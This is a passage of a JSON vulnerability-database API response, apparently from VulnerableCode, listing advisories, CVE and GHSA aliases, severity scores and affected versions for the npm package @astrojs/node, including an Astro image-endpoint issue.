                    "url": "http://public2.vulnerablecode.io/api/packages/86109?format=api",
                    "purl": "pkg:npm/%40astrojs/node@9.4.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-b47j-p5et-rfem"
                        },
                        {
                            "vulnerability": "VCID-c6g3-td4y-gbgj"
                        },
                        {
                            "vulnerability": "VCID-ecmk-efnj-nbfq"
                        },
                        {
                            "vulnerability": "VCID-jt7q-nwep-wbfb"
                        },
                        {
                            "vulnerability": "VCID-mu7k-psez-uudf"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.4.1"
                }
            ],
            "aliases": [
                "CVE-2025-55207",
                "GHSA-9x9c-ghc5-jhw9"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mhk4-vf4t-47g7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57897?format=api",
            "vulnerability_id": "VCID-qcs7-nt67-7qe5",
            "summary": "Astro allows unauthorized third-party images in _image endpoint\nIn affected versions of `astro`, the image optimization endpoint in projects deployed with on-demand rendering allows images from unauthorized third-party domains to be served.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55303",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00134",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32524",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00134",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32562",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00134",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32594",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55303"
                },
                {
                    "reference_url": "https://github.com/withastro/astro",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/withastro/astro"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/commit/4d16de7f95db5d1ec1ce88610d2a95e606e83820",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-19T20:49:42Z/"
                        }
                    ],
                    "url": "https://github.com/withastro/astro/commit/4d16de7f95db5d1ec1ce88610d2a95e606e83820"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55303",
                    "reference_id": "CVE-2025-55303",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55303"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xf8x-j4p2-f749",
                    "reference_id": "GHSA-xf8x-j4p2-f749",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-xf8x-j4p2-f749"
                },
                {
                    "reference_url": "https://github.com/withastro/astro/security/advisories/GHSA-xf8x-j4p2-f749",
                    "reference_id": "GHSA-xf8x-j4p2-f749",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-19T20:49:42Z/"
                        }
                    ],
                    "url": "https://github.com/withastro/astro/security/advisories/GHSA-xf8x-j4p2-f749"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/86140?format=api",
                    "purl": "pkg:npm/%40astrojs/node@9.1.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-b47j-p5et-rfem"
                        },
                        {
                            "vulnerability": "VCID-c6g3-td4y-gbgj"
                        },
                        {
                            "vulnerability": "VCID-ecmk-efnj-nbfq"
                        },
                        {
                            "vulnerability": "VCID-jt7q-nwep-wbfb"
                        },
                        {
                            "vulnerability": "VCID-mhk4-vf4t-47g7"
                        },
                        {
                            "vulnerability": "VCID-mu7k-psez-uudf"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@9.1.1"
                }
            ],
            "aliases": [
                "CVE-2025-55303",
                "GHSA-xf8x-j4p2-f749"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qcs7-nt67-7qe5"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "3.9",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.0.3"
}